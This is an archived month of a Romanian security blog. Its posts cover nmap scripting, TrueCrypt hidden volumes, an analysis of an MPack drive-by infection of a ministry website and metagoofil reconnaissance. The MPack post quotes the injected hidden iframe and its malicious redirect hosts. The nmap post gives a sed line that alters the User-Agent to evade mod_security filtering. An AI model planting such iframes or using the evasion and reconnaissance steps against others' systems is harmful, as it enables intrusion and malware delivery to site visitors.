You are currently browsing the monthly archive for Februarie 2008.

Incepind cu versiunea 4.21 celebrul port scanner pune la dispozitie (NSE = nmap scripting engine) care permite dezvoltarea unor plug-in-uri pentru nmap in incercarea de a automatiza anumite task-uri sau de a obtine mai multe informatii. Scripting engine-ul se bazeaza pe limbajul de probramare LUA. Specificatiile pot fi gasite aici.
Citeva exemple si optiuni:

nmap-4.53$ ./nmap -sC ip

foloseste toate categoriile de scripturi existente pentru a testa un host.Scripturile sint inmpartite in diferite categorii cum ar fii de exemplu: safe, intrusive, malware, version, discovery si vulnerability.
Verificarea daca site-ul suporta SSL versiunea 2, care poate fii destul de usor atacata.

nmap-4.53$ ./nmap -n -sT -PS53 -PN www.yahoo.com --script=scripts/SSLv2-support.nse -p 443

 Starting Nmap 4.53 ( http://insecure.org ) at 2008-02-06 08:49 CET

Interesting ports on 69.147.114.210:

PORT    STATE SERVICE

443/tcp open  https

|  SSLv2: server still supports SSLv2

|       SSL2_DES_192_EDE3_CBC_WITH_MD5

|       SSL2_IDEA_128_CBC_WITH_MD5

|       SSL2_RC2_CBC_128_CBC_WITH_MD5

|       SSL2_RC4_128_WITH_MD5

|       SSL2_RC4_64_WITH_MD5

|       SSL2_DES_64_CBC_WITH_MD5

|       SSL2_RC2_CBC_128_CBC_WITH_MD5

|_      SSL2_RC4_128_EXPORT40_WITH_MD5

Nmap-ul suporta operatiunea de update a bazei de date cu plug-in-uri:

nmap-4.53$ ./nmap --script-updatedb

Pagina de documentatie a NSE-ului este aici.

PS. Numeroase scripturi folosite la testarea functiilor de HTTP folosesc ca „User-Agent: Nmap NSE”. Va recomand sa-l schimbati pentru a evita masurile de protectie existente si care se bazeaza pe mod_security sau rewrite engine si recunosc anumite stringuri de caractere in User Agent.

sed 's/User-Agent: Nmap NSE\\r\\n/User-Agent: Mozilla\/4.75 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n/g' showHTTPVersion.nse

Have fun. :-))

Anunțuri

Astazi ar trebui sa fie lansata versiunea 5.o a softului Open Source Truecrypt. Nu stiu cit de multi dintre voi folositi asa ceva, dar eu am fost convins de un anumit feature care m-a impresionat. Puteti crea intr-o partitie sau container 2 volumuri criptate. In functie de parola pe care o tastati se deschide volumul „oficial” sau cel ascuns. Nu exista pina acum nici o metode de a determina daca exista intr-un container sau partitie un volum ascunss. Cum sa o folositi, sta la latitudinea fiecaruia.

Inca nu am reusit sa fac rost de prea multe informatii despre noile optiuni oferite de Truecrypt 5.0 dar dupa ce o voi testa, sigur voi scrie despre soft. Mie mi se pare genial si mai ales …este free. Ceea ce nu poate versiunea 4.3 si astept de la versiunea 5.0 este full disk encryption.

Have fun.

Ma hotarisem sa nu scriu despre MPack pentru ca consideram ca este prea cunoscut ca sa mai fie un subiect care sa intereseze pe cineva. Dar se pare ca am fost contrazis de realitate. Astazi am primit urmatorul mail.

Buna ziua

Lucrez la o institutie publica din domeniul sanatatii si ma ocup de partea de IT. Relativ de curind Ministerul Sanatatii si-a actualizat site-ul (http://www.ms.ro/) pastrind totusi activa si varianta veche care este accesibila din noul site http://www.ms.ro / ms_vechi.asp .

Problema (grava) este ca acesta din urma este infectat cu MPack (Wikipedia, http://code-foundation.de/2008/01/31/hunting-mpack-in-the-wild/) un mallware foarte agresiv si ‘eficient’.

Poate gasiti un spatiu pe blogul dumneavoastra in care sa atrageti atentia asupra acestei probleme care afecteaza site-ul unei institutii publice importante din Romania (nu am gasit o adresa de email a webmaster-ul si oricum ma indoiesc ca ar fi folosit la ceva).

Cu stima,
V. M.

Numele domnului care mi-a scris l-am trecut sub anonimat pentru ca nu am obtinut acordul lui, iar adresa paginii de web am scris-o intentionat trunchiat pentru a nu cumva cineva sa aiba ideea de a da click, decit daca stie ce face.

Prima data am analizat versiunea 0,94 a celebrului pachet MPack in decembrie. Am fost impresionat de modul in care functioneaza si de infrastructura care sta in spate.

Dar ce este de fapt MPack si care este vectorul de atac? Pachetul care poate fi obtinut de pe piata neagra pentru preturi variind intre 300 si 1000 de USD, contine scripturile de instalare a interfetei web scrisa in PhP si a unei baze de date mySQL care este folosit ca centru de comanda. Aici sint strinse informatiile despre hosturile noi care au fost explatate cu succes si inclusiv o distributie pe tari. A doua parte sint exploiturile in sine care au ca obiectiv browser-ul in sine (Internet Explorer, Firefox sau Opera) sau plugins-urile sau BHO-urile aferente (QuickTime Player, VLC, Acrobat Reader) urmate de instalarea unui root-kit care permite centrului de comanda sa controleze calculatorul infectat. BHO (Browser Helper Object) in lumea IE-ului sau extensile de la Firefox ajuta browser-ul pentru a putea sa prezinte continutul unui site de web in cazul in care browser-ul in sine nu o poate face. De exemplu filmele pot fii prezentate prin invocarea de catre browser a programului Qicktime Player.

Dar care este anatomia unui atac si cum funtioneaza in cazul Ministerului Sanatatii. Cineva a descoperit ca poate modifica continutul fisierului de pe site-ul ministerului sanatatii. Si a si facut-o incluzind un iframe invizilbil in pagina Ministerului sanatatii care redirectioneaza browserul catre site-ul http://updateservernet.cn si executa fisierul tank.php.

mpack.png

Iframe-urile au fost initial concepute pentru a putea prezenta in site-ul propriu in timp real continutul altui site. Acelasi lucru este folosit si aici unde browserul unui utilizator obisnuit este redirectionat automat catre un alt site fara cunostinta acestuia.

Pe aceste site se gaseste o pagina care contine un alt iframe ce redirectioneaza catre un al doilea site cum se poate vedea mai jos.

iframe src=”http : // 195 . 2 . 253 . 203 / w / wtsin.cgi?s=z” style=”display:none”></iframe

care face apoi redirectarea catre  http : // 195 . 2 . 253 . 203 / sp / index.php

Aici are loc exploatare propriuzisa fiind livrat un pachet de exploit-uri in funtie de browserul care acceseaza pagina, urmata de instalarea unui root-kit.

mpack2.png

Simplu nu??

Ce se poate face un user normal?

  • Antivirusul la zi cu toate ca Mpack-ul are posibilitatea de a livra noi exploituri care nu sint recunoscute imediat de producatorii de antivirus.
  • Evitarea de a naviga pe internet folosind contul de administrator.
  • Update-ul tuturor softurilor care sint folosite de catre Internet Explorer sau Firefox (Quicktime Player, VLC, etc) sau chiar dezactivarea lor.
  • Dezactivarea posibilitatii de a rula scripturi Java cu toate ca aceasta optiune este din ce in ce mai greu de pus in aplicare datorita constructiei site-urilor de Internet.
  • sau…ce spunea unul din creatorii Mpack-ului intr-un interviu in Securit Focus.

I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.

Mai multe informatii despre constructia pachetului MPack se poate gasi pe site-ul Antivirusului Panda.

Mi-as dori mai multa atentie din partea departamentelor de IT care sint subordonate Ministerelor, nu numai pentru ca in primul rind sint responsabile de securitatea retelelor si site-ului proprii dar si datorita faptului ca fiind institutii publice au un numar de accesari foarte mare care poate duce ca in cazul de fata la infectari dramatice.

P.S. Cautarile mele ca si ale domnului V.M de a gasi o persoana de contact raspunzatoare de site-ul Ministerului Sanatatii au fost soldate cu un esec lamentabil si deci daca cineva cunoaste pe Cineva in Ministerul Sanatarii va rog sa-i contactati sa-si curete ograda. Multumesc.

Ce este fisierul „robots.txt” care este gasit de obicei in multe din serverele aflate din internet? Cind un motor de cautare incearca sa indexeze un site, directoarele incluse in acest fisier nu sint indexate de motorul de cautare si nu vor fii niciodata gasite cu ajutorul acelui motor de cautare.

Fisierul este si o posibila problema de securitate pentru ca directoarele aflate acolo pot oferi informatii despre posibile interfete de administrare ale site-ului sau alte directoare care de obicei sint ascunse. Darrrrrrrrrrrr….haide sa vedem cum arata fisierul site-ului oficial parodie al Casei Albe.

# robots.txt for http://www.whitehouse.org/

User-agent: *
Disallow: /american-theocracy/
Disallow: /bulletin/
Disallow: /halliburton-extranet/
Disallow: /illuminati/
Disallow: /operation-fascist-brainwashing/
Disallow: /payola-for-polluters/
Disallow: /plotocrats-only/
Disallow: /press/
Disallow: /skull-and-bones/
Disallow: /subscribe/
Disallow: /transfer/

User-agent: asterias
Disallow: /

Concluziile va las pe voi sa le trageti. Oare ce are de-a face Casa Alba cu „iluminati” sau „operation-fascist-brainwashing”????

Have a nice week-end.

P.S. Pentru faptul ca a observat diferenta George primeste o bere la alegerea lui :-))

Anul trecut la Defcon una din cele mai interesante presentari a fost cea a lui HD Moore „Tactical Explotation” in care a fost avansata ideea ca nu este nevoie intotdeauna sa folosesti super exploit-uri pentru a reusi sa obtii access in reteaua unei companii. Informatiile oferite de google si alte site-uri de social networking ofera o baza solida pentru a face rost de conturi care apoi pot fii folosite in procesul de brutforce sau social engineering. Un tool foarte interesant in acest domeniu este metagoofil oferit de cei de la Edge Security. Folosind utilitarul extract din Linux, care extrage metainformatiile continute de un document word, excel, powerpoint sau pdf, metagoofil cauta pe google toate documentele care au fost indexate de motorul ca cautare, acceseaza site-ul, le download-aza si apoi extrage informatiile aflate in cimpurile de metadata care de obicei contin numele autorului sau chiar numele user-ului, plus locatia unde a fost salvat.

sintaxa este:

#python metagoofil.py -d mydomain.test -l 100 -f all -o /tmp/mydomain.test.html -t /tmp/mydomain.test

unde:

-d este domeniul de analizat.

-l limita rezultatelor cu care sa lucreze (default este 100)

-f tipul de fisiere ce trebuie analizate (all, pdf, xls, doc, ppt, odp,ods, etc)

-o output-ul in fromat html

-t directorul target unde se salveaza datele.

Incercati sa rulati utilitarul impotriva propriei companii sa vedeti cite date sint expuse prin aceasta metoda. Veti fi surprinsi de rezultate. 🙂

Si daca tot sintem aici incercati sa vedeti ce gaseste Paterva, despre compania proprie.

Un tutorial online despre metagoofil poate fi urmarit aici.

Btw, acum puteti urmarii online presentare de la Defcon a lui HD Moore.

Have a lot of fun.

Februarie 2008
L M M M V S D
« Ian   Mar »
 123
45678910
11121314151617
18192021222324
2526272829